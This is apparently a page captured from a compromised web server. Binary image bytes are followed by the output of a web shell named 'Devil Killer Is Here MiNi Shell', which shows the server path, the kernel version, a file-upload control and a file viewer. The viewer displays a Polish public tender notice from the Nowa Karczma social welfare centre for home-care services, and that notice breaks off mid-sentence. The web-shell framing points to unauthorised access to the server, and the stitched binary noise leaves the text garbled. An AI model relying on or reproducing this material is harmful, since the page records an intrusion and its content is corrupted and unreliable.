JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250905/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250905/0040918101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług opiekuńczych oraz specjalist. usług opiekuńczych dla uczestników projektu nr FEPM.05.17-IZ.00-0015/24 pn.”Usługi społeczne w Gminie Nowa Karczma” w ramach FE dla Pomorza 2021-2027 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ośrodek Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 192042802</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Gdańska 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowa Karczma</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-404</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL637 - Chojnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(058) 58 680 06 47</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@opsnowakarczma.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://nowakarczma.biuletyn.net/?bip=1&amp;cid=97</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług opiekuńczych oraz specjalist. usług opiekuńczych dla uczestników projektu nr FEPM.05.17-IZ.00-0015/24 pn.”Usługi społeczne w Gminie Nowa Karczma” w ramach FE dla Pomorza 2021-2027 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-965b4c85-2ceb-4a6b-9d95-8accdf865e10</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00409181</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00317242/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Świadczenie usług opiekuńczych oraz specj. usług opiek. dla uczestników projektu nr FEPM.05.17-IZ.00-0015/24 pn.”Usługi społeczne w Gminie Nowa Karczma” w ramach FE dla Pomorza 2021-2027</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.12.) Rodzaj wykonawców, którzy mogą ubiegać się o udzielenie zamówienia: </h3> <p class="mb-0">art. 94 ust. 1 pkt 1) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 2) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 3) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 4) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 5) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 6) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 7) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 8) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 9) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 10) ustawy</p> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Usługi Społeczne w Gminie Nowa Karczma nr FEPM.05.17-IZ.00-0015/24 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-965b4c85-2ceb-4a6b-9d95-8accdf865e10 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy https://ezamowienia.gov.pl/ w przypisanym postępowaniu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na platformie https://ezamowienia.gov.pl/. Wykonawca posiadający konto na ww. platformie ma dostęp do niezbędnych formularzy, m.in.: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji. Więcej informacji dotyczących zakładania konta na platformie: https://media.ezamowienia.gov.pl/pod/2020/11/ZKU-5.2.pdf .<br/>2.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz informacji przekazywanych przy ich użyciu zostały opisane w Regulaminie korzystania z platformy https://ezamowienia.gov.pl/pl/ (więcej informacji: https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu). <br/>3. Za datę przekazania dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz innych informacji przyjmuje się datę ich przekazania na platformie e-zamowienia.pl. <br/>4.	Postępowanie można wyszukać na liście wszystkich postępowań lub ze strony głównej platformy https://ezamowienia.gov.pl/pl.<br/>5.	Dokumenty elektroniczne (inne niż oferta oraz załączniki do oferty) oraz cyfrowe odwzorowanie dokumentów składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość składania w/w (tj. innych) dokumentów elektronicznych oraz cyfrowych odwzorowań dokumentów za pomocą poczty elektronicznej, na adres e-mail: sekretariat@opsnowakarczma.pl<br/>6.	Sposób sporządzania dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz informacji musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursu (Dz. U. z 2020 r., poz. 2452). <br/><br/>Forma i zasady składania dokumentów i oświadczeń w tym dotyczących podmiotowych środków dowodowych (za wyjątkiem oferty i oświadczeń o spełnieniu warunków udziału w postępowaniu i oświadczeń o braku podstaw wykluczenia z postępowania): <br/><br/>1) Dokumenty lub oświadczenia, Wykonawca składa w oryginale lub kopii poświadczonej za zgodność z oryginałem w formie elektronicznej, w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym. Jeżeli oryginał dokumentu lub oświadczenia, o których mowa powyżej nie zostały sporządzone w postaci dokumentu elektronicznego, wykonawca może sporządzić i przekazać elektroniczną kopię posiadanego dokumentu lub oświadczenia. W przypadku przekazywania przez wykonawcę elektronicznej kopii dokumentu lub oświadczenia, opatrzenie jej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez wykonawcę jest równoznaczne z poświadczeniem elektronicznej kopii dokumentu lub oświadczenia za zgodność z oryginałem. <br/>2) Formaty plików muszą być zgodne z krajowymi Ramami Interoperacyjności ROZPORZĄDZENIE RADY MINISTRÓW z dnia 21 maja 2024 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz.U. z 2024, poz. 773). Zamawiający nie dopuszcza przesyłania plików w następujących formatach: - .com - .exe - .bat - .msi. <br/>3)	W przypadku podpisania dokumentu elektronicznego kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym osoba składająca taki podpis musi być umocowana w imieniu wykonawcy zgodnie z obowiązującymi przepisami. <br/>4) Zamawiający dopuszcza także – przed terminem składania ofert zadawanie pytań/żądanie wyjaśnień do SWZ czy prowadzonego postępowania poprzez środek komunikacji elektronicznej zgodnie z zapisami SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>•	Administratorem Pani/Pana danych osobowych jest Ośrodek Pomocy Społecznej w Nowej Karczmie z siedzibą w 83-404 Nowa Karczma przy ul. Gdańskiej 6, NIP 5911526809, REGON 192042802, zwany dalej Administratorem; Administrator prowadzi operacje przetwarzania Pani/Pana danych osobowych,<br/>•	dane kontaktowe inspektora ochrony danych osobowych w Ośrodku Pomocy Społecznej w Nowej Karczmie: inspektorem danych osobowych u Administratora jest Eliza Szczesna,e-mail: inspektor25052018@gmail.com *,<br/>•	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym <br/>z postępowaniem o udzielenie zamówienia publicznego na: <br/>Świadczenie usług opiekuńczych oraz specjalistycznych usług opiekuńczych dla uczestników projektu nr FEPM.05.17-IZ.00-0015/24 pn.”Usługi społeczne w Gminie Nowa Karczma” w ramach FE dla Pomorza 2021-2027.<br/>•	Odbiorcami Pani / Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust 3 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2024, poz. 1320 ze zm.) dalej „ustawa Pzp”;<br/>•	Pani/Pana dane osobowe będą przechowywane, zgodnie z ustawą Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>•	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/ Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem postępowania o udzielnie zamówienia publicznego, konsekwencje nie podania określonych danych wynikają z ustawy Pzp;<br/>•	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>•	Pani/ Pana dane nie będą udostępniane do państwa trzeciego ani organizacji międzynarodowej;<br/>•	Posiada Pani/Pan;<br/>•	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana związanych z prawem Wykonawcy do uzyskania od Administratora potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące, prawem Wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o których mowa w art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub organizacji międzynarodowej oraz prawem otrzymania przez Wykonawcę od administratora kopii danych osobowych podlegających przetwarzaniu. Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>•	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*; <br/>•	na podstawie art. 18 RODO prawo do żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO**;<br/>•	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>•	Nie przysługuje Pani/ Panu;<br/>•	z art.17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>•	prawo do przenoszenia danych osobowych, o których mowa w art.20 RODO;<br/>•	na podstawie art.21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawa prawną przetwarzania Pani/Pana danych jest art.6 ust.1 lit. C RODO.<br/><br/>Całość klauzuli inf. wpisana - zgodnie z zapisami rozdz. XXIV SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OPS.PS.231.2.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem postępowania jest świadczenie usług opiekuńczych (o których mowa w art. 50 ust. 3 ustawy z dnia 12 marca 2004 r. o pomocy społecznej) dla 15 osób, klientów Ośrodka Pomocy Społecznej w Nowej Karczmie na terenie gminy Nowa Karczma, w ilości 3.480 godzin łącznie, tj. średnio 145 h w miesiącu (średnio 232 h/osobę) w okresie od 1 października 2025 roku do 15 grudnia 2027 roku.<br/>2)	Usługi, o których mowa w pkt 1 Wykonawca, będzie zobowiązany zapewniać w sposób nieprzerwany i właściwy pod względem jakości procesu świadczenia usług przez 7 dni w tygodniu, poprzez właściwe ustalenie z osobami świadczącymi usługi opiekuńcze godzin oraz zleconego wymiaru i zakresu usług.<br/><br/>3)	Czas wykonywania usług: 1 godzina usługi równa się 1 godzinie zegarowej tj. 60 minut. <br/>4)	Pod pojęciem ilości godzin świadczonych usług należy rozumieć wyłącznie rzeczywisty czas świadczenia usług bez czynności przygotowawczych tzn. bez czasu potrzebnego na dojście lub dojazd. <br/><br/>5)	Liczba godzin 3.480 w ust. 1 jest liczbą szacunkową, wymiar świadczonych usług wynosi szacunkowo 145 godzin miesięcznie dla około 15 osób. <br/>6)	Liczba godzin może ulec zmianie, ponieważ nie można jej określić dokładnie ze względu na specyfikę zamówienia, którą cechuje zmienność potrzeb z uwagi na zmieniający się stan zdrowia i sytuację życiową osób wymagających pomocy.<br/><br/>7)	Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia ilości świadczonych godzin usług opiekuńczych w zależności od rzeczywistych potrzeb i możliwości finansowych. Wynagrodzenie należne Wykonawcy zostanie ustalone na podstawie ceny brutto 1 godziny usług opiekuńczych podanej w ofercie. Zmiany ilościowe godzin, jak i zmniejszenie wartości umowy nie wymagają aneksu do umowy. W ramach ceny ofertowej Zamawiający zastrzega sobie prawo nie wykorzystania w całości zamawianych ilości godzin. Wykonawcy przysługuje wynagrodzenie za ilość faktycznie świadczonych godzin usług i nie będzie zgłaszał żadnych roszczeń co do realizacji pozostałej, niezleconej przez Zamawiającego części.<br/><br/>8)	Przedmiot zamówienia obejmuje wykonanie usług opiekuńczych dla osób, które z powodu wieku, choroby lub innych przyczyn nie są w stanie zaspokoić codziennych potrzeb życiowych, opieki higienicznej, zleconej przez lekarza pielęgnacji oraz zapewnić kontaktów z otoczeniem a także dla osób, które wymagają pomocy innych osób, a rodzina takiej pomocy nie może zapewnić.<br/>9)	Wykonawca jest zobowiązany uwzględnić podmiotowość odbiorców usług/klientów OPS, w tym respektować prawa do poszanowania i ochrony godności, intymności, w szczególności w przypadku czynności o charakterze opieki higienicznej i pielęgnacji oraz poczucia bezpieczeństwa i ochrony dóbr osobistych.<br/>10)	Wykonawca, z którym Zamawiający zawrze umowę na świadczenie usług opiekuńczych, będzie zobowiązany do wykonywania przedmiotu zamówienia ze szczególną starannością, zapewniając racjonalne wykorzystanie środków technicznych i pracowników oraz dbałość o mienie klientów. Wykonawca zobowiązany jest zatrudnić osoby niekaralne, sprawne fizycznie i intelektualnie, zdolne do wykonania prac fizycznych, posiadające umiejętność utrzymywania prawidłowych kontaktów interpersonalnych.<br/>11)	Wykonawca zobowiązany będzie wykonać przedmiot umowy zgodnie z niniejszym przedmiotem zamówienia, ustawą z dnia 12 marca 2004 roku o pomocy społecznej (t.j. Dz. U. z 2024 r. poz. 1283 ze zm.). Ponadto usługi Wykonawca powinien świadczyć zgodnie ze współczesną wiedzą techniczną i obowiązującymi normami europejskimi zapewniając bezpieczne i higieniczne warunki pracy. Wykonawca musi wykazać odpowiednie przygotowanie i kwalifikacje do świadczenia usług opiekuńczych.<br/>12)	Zamawiający określa, że usługi opiekuńcze mają być świadczone przez osoby, które posiadają:<br/>a)	kwalifikacje do wykonywania jednego z zawodów: opiekun środowiskowy, asystent osoby niepełnosprawnej, pielęgniarz, opiekun osoby starszej, opiekun medyczny, opiekun kwalifikowany w domu pomocy społecznej lub<br/>b)	doświadczenie w realizacji usług opiekuńczych, w tym zawodowe, wolontariackie lub osobiste wynikające z pełnienia roli opiekuna faktycznego i odbyła minimum 80-godzinne szkolenie z zakresu realizowanej usługi, w tym udzielania pierwszej pomocy lub pomocy przedmedycznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85312000-9 - Usługi opieki społecznej nieobejmujące miejsc noclegowych</p> <p class="mb-0">85311100-3 - Usługi opieki społecznej dla osób starszych</p> <p class="mb-0">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-10-01 do 2027-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający przy wyborze najkorzystniejszej oferty będzie się kierował następującymi kryteriami:<br/>CZĘŚĆ I<br/>Kryterium cena – 60 % (60 pkt)<br/>Kryterium doświadczenie zawodowe koordynatora usług - 40% (40 pkt)<br/>1. Kryterium cena zostanie ocenione w skali punktowej do 60 pkt. Oferta z najtańszą ceną uzyska 60 pkt, pozostałe oferty<br/>proporcjonalnie mniej punktów. Punkty zostaną wyliczone według następującego wzoru:<br/> oferta z najniższą ceną przedstawiona w ofertach<br/>A =--------------------------------------------------------------- x 100 x 60 %<br/> cena oferty ocenianej<br/>gdzie: A – liczba otrzymanych punktów<br/>2. Kryterium doświadczenie koordynatora usług zostanie ocenione w skali punktowej do 40 pkt. Liczba punktów zostanie wyliczona<br/>na podstawie wykazanych przez Wykonawcę w Załączniku nr 5 do SWZ według następujących zasad:<br/>doświadczenie koordynatora:<br/>• od rozpoczęcia pracy do 2 lat – 0 pkt<br/>• powyżej 2 lat do 4 lat – 8 pkt<br/>• powyżej 4 lat do 6 lat – 16 pkt<br/>• powyżej 6 lat do 8 lat – 24 pkt<br/>• powyżej 8 lat do 10 lat – 32 pkt<br/>• powyżej 10 lat – 40 pkt<br/>Oferta Wykonawcy z największym doświadczeniem uzyska 40 pkt, pozostałe oferty proporcjonalnie mniej punktów. W przypadku,<br/>gdy doświadczenie koordynatora będzie krótsze niż 2 lata, oferta Wykonawcy zostanie odrzucona. W przypadku wskazania w<br/>Załączniku nr 5 SWZ większej ilości osób przewidzianych przez Wykonawcę do wykonania czynności koordynatora, doświadczenia tych osób nie będą sumowane, a do oceny zostanie przyjęte doświadczenie osoby, która posiada największe doświadczenie.<br/>Punkty zostaną wyliczone według następującego wzoru:<br/> ilość wykazanych lat w badanej ofercie<br/>A = -------------------------------------------------- x 100 x 40 %<br/> maksymalna ilość wykazanych lat<br/><br/>spośród wszystkich ofert<br/>gdzie: A – liczba otrzymanych punktów<br/><br/>3. Obliczenia kryteriów cena i doświadczenie koordynatora usług będą dokonywane z dokładności do dwóch miejsc po przecinku.<br/>4. Zamówienie zostanie udzielone Wykonawcy, który uzyska najwyższą liczbę punktów w wyniku oceny na podstawie kryteriów<br/>oceny określonych w Rozdziale XIV niniejszej SWZ. Maksymalna ilość punktów jaką, po uwzględnieniu wagi kryteriów, może<br/>osiągnąć oferta wynosi 100 pkt.<br/>5. W przypadku, gdy nie można będzie dokonać wyboru oferty z uwagi na to, że więcej ofert posiada 